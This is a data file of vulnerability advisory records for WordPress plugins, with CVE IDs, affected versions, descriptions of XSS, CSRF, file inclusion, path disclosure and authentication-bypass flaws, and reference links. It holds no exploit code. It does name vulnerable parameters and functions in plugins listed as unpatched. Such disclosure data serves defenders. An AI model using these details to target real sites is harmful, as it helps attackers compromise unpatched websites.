{"CVE_ID":"CVE-2024-2253","slug":"testimonials-carousel-elementor","versionImpact":"10.2.2","description":"The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via URL values the plugin's carousel widgets in all versions up to, and including, 10.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d559b862-ee07-4207-8c64-81961516a046?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d559b862-ee07-4207-8c64-81961516a046?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-employees.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-employees.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6566","slug":"aramex-shipping-woocommerce","versionImpact":"1.1.21","description":"The Aramex Shipping WooCommerce plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.1.21. This is due the plugin not preventing direct access to the composer-setup.php file which also has display_errors enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd71c-3d08-4767-b471-a1d5a17fe6ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd71c-3d08-4767-b471-a1d5a17fe6ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aramex-shipping-woocommerce\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aramex-shipping-woocommerce\\\/trunk\\\/vendor\\\/jurosh\\\/pdf-merge\\\/bin\\\/composer-setup.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9702","slug":"social-rocket","versionImpact":"1.3.4","description":"The Social Rocket \u2013 Social Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialrocket-floating' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-rocket\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/social-rocket\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d4d948e-359e-4514-9c8f-dbd8198ef4fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d4d948e-359e-4514-9c8f-dbd8198ef4fe?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28914","slug":"wp-show-login-form","versionImpact":"0.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ajay Sharma wordpress login form to anywhere allows Stored XSS. This issue affects wordpress login form to anywhere: from n\/a through 0.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-show-login-form\\\/vulnerability\\\/wordpress-wordpress-login-form-to-anywhere-plugin-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-show-login-form\\\/vulnerability\\\/wordpress-wordpress-login-form-to-anywhere-plugin-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12722","slug":"twitter-bootstrap-collapse-aka-accordian-shortcode","versionImpact":"1.0","description":"The Twitter Bootstrap Collapse aka Accordian Shortcode WordPress plugin through 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3be5990-ca89-4ac4-baae-49af55df9d57\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3be5990-ca89-4ac4-baae-49af55df9d57\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4369","slug":"companion-auto-update","versionImpact":"3.9.2","description":"The Companion Auto Update plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018update_delay_days\u2019 parameter in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-auto-update\\\/tags\\\/3.9.2\\\/admin\\\/dashboard.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-auto-update\\\/tags\\\/3.9.2\\\/admin\\\/dashboard.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325878\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325878\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/companion-auto-update\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/companion-auto-update\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c61072-5480-43f3-ad9f-ed3f0d577ebc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c61072-5480-43f3-ad9f-ed3f0d577ebc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4352","slug":"wp-jobsearch ","versionImpact":"1.8.1","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the save_locsettings function in versions up to, and including, 1.8.1. This makes it possible for unauthenticated attackers to change the settings of the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59170f0a-975e-487c-bdb0-585c802b3127?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59170f0a-975e-487c-bdb0-585c802b3127?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed7e664e-5a73-4d2d-a599-a0be89d6c2d1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed7e664e-5a73-4d2d-a599-a0be89d6c2d1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3941","slug":"recaptcha-jetpack","versionImpact":"0.2.2","description":"The reCAPTCHA Jetpack WordPress plugin through 0.2.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e09e922-983c-4406-8053-747d839995d1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e09e922-983c-4406-8053-747d839995d1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3726","slug":"login-logout-register-menu","versionImpact":"2.0","description":"The Login Logout Register Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'llrmloginlogout' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8a93aab-4845-46ed-8adc-d06b2ee8ee9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8a93aab-4845-46ed-8adc-d06b2ee8ee9e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-register-menu\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-register-menu\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6549","slug":"admin-post-navigation","versionImpact":"2.1","description":"The Admin Post Navigation plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d27ef0b4-266f-47b8-a7aa-ddff5adaac7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d27ef0b4-266f-47b8-a7aa-ddff5adaac7a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-post-navigation\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-post-navigation\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6590","slug":"wpgsi","versionImpact":"3.7.9","description":"The Spreadsheet Integration \u2013 Automate Google Sheets With WordPress, WooCommerce & Most Popular Form Plugins. Also, Display Google sheet as a Table. plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 3.7.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit post status, edit Google sheet integrations, and create Google sheet integrations.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ff2cc-9af2-4b72-bc49-e205275daa4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ff2cc-9af2-4b72-bc49-e205275daa4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L812\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L812\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L863\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L863\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L935\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L935\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L1168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L1168\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6480","slug":"sip-reviews-shortcode-woocommerce","versionImpact":"1.2.3","description":"The SIP Reviews Shortcode for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'no_of_reviews' attribute in the woocommerce_reviews shortcode in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43aa28ec-6553-4527-a1d1-eb4a58533c5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43aa28ec-6553-4527-a1d1-eb4a58533c5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L424\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L424\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10909","slug":"pojo-forms","versionImpact":"1.4.7","description":"The The Pojo Forms plugin for WordPress is vulnerable to arbitrary shortcode execution via form_preview_shortcode AJAX action in all versions up to, and including, 1.4.7. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. This was partially fixed in version 1.4.8.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pojo-forms\\\/tags\\\/1.4.7\\\/classes\\\/class-pojo-forms-ajax.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pojo-forms\\\/tags\\\/1.4.7\\\/classes\\\/class-pojo-forms-ajax.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201936\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201936\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pojo-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pojo-forms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9697","slug":"social-rocket","versionImpact":"1.3.4","description":"The Social Rocket \u2013 Social Sharing Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tweet_settings_save() and tweet_settings_update() functions in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5501\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5501\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/168dd2d4-bffb-4187-afc7-02fef8cb51a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/168dd2d4-bffb-4187-afc7-02fef8cb51a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28894","slug":"list-posts-by-category","versionImpact":"2.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in frucomerci List of Posts from each Category plugin for WordPress allows Stored XSS. This issue affects List of Posts from each Category plugin for WordPress: from n\/a through 2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/list-posts-by-category\\\/vulnerability\\\/wordpress-list-of-posts-from-each-category-plugin-for-wordpress-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/list-posts-by-category\\\/vulnerability\\\/wordpress-list-of-posts-from-each-category-plugin-for-wordpress-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4394","slug":"locations","versionImpact":"3.2.1","description":"The Locations plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.1. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to update custom field meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3df9f237-a861-43fc-8623-d42f84d8d5d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3df9f237-a861-43fc-8623-d42f84d8d5d1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548546%40locations&new=2548546%40locations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548546%40locations&new=2548546%40locations&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4488","slug":"dropbox-folder-share","versionImpact":"1.9.7","description":"The Dropbox Folder Share for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.9.7 via the editor-view.php file. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647a2f27-092a-4db1-932d-87ae8c2efcca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647a2f27-092a-4db1-932d-87ae8c2efcca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/UsosGenerales\\\/js\\\/editor-view.php?rev=2904670\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/UsosGenerales\\\/js\\\/editor-view.php?rev=2904670\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4922","slug":"wpb-show-core","versionImpact":"2.2","description":"The WPB Show Core WordPress plugin through 2.2 is vulnerable to a local file inclusion via the `path` parameter.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/968d87c0-af60-45ea-b34e-8551313cc8df\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/968d87c0-af60-45ea-b34e-8551313cc8df\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4393","slug":"social-connect","versionImpact":"1.2","description":"The Social Connect plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2. This is due to insufficient verification on the OpenID server being supplied during the social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2882d9dd-0c73-4c9a-99cb-d10900503103?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2882d9dd-0c73-4c9a-99cb-d10900503103?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-connect\\\/tags\\\/1.2\\\/openid\\\/openid.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-connect\\\/tags\\\/1.2\\\/openid\\\/openid.php#L575\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3940","slug":"recaptcha-jetpack","versionImpact":"0.2.2","description":"The reCAPTCHA Jetpack WordPress plugin through 0.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb0245e5-8e94-4f11-9003-d6208945056c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb0245e5-8e94-4f11-9003-d6208945056c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6548","slug":"add-admin-javascript","versionImpact":"2.0","description":"The Add Admin JavaScript plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1069c845-30b9-4aca-8a60-8b66c48365af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1069c845-30b9-4aca-8a60-8b66c48365af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-javascript\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-javascript\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
